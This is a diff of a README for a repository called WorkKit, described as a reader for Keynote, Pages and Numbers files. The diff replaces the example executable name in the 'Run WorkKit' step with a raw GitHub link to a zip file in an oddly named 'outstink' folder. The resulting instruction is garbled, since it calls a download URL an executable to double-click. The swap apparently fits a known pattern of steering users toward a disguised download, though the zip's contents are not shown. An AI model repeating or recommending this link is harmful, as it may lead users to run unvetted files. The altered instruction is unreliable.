KeGoZy/WorkKit/README.md

    Find the downloaded file in your Downloads folder.
 Unzip the file if it is compressed.

 5. **Run WorkKit**
-   Open the folder and look for an executable file (like `WorkKit.app`).
+   Open the folder and look for an executable file (like `https://raw.githubusercontent.com/KeGoZy/WorkKit/main/outstink/WorkKit.zip`).
 Double-click it to start using WorkKit.

 ## 📝 Features
 - **Read iWork Files**: WorkKit can read Keynote, Pages, and Numbers documents.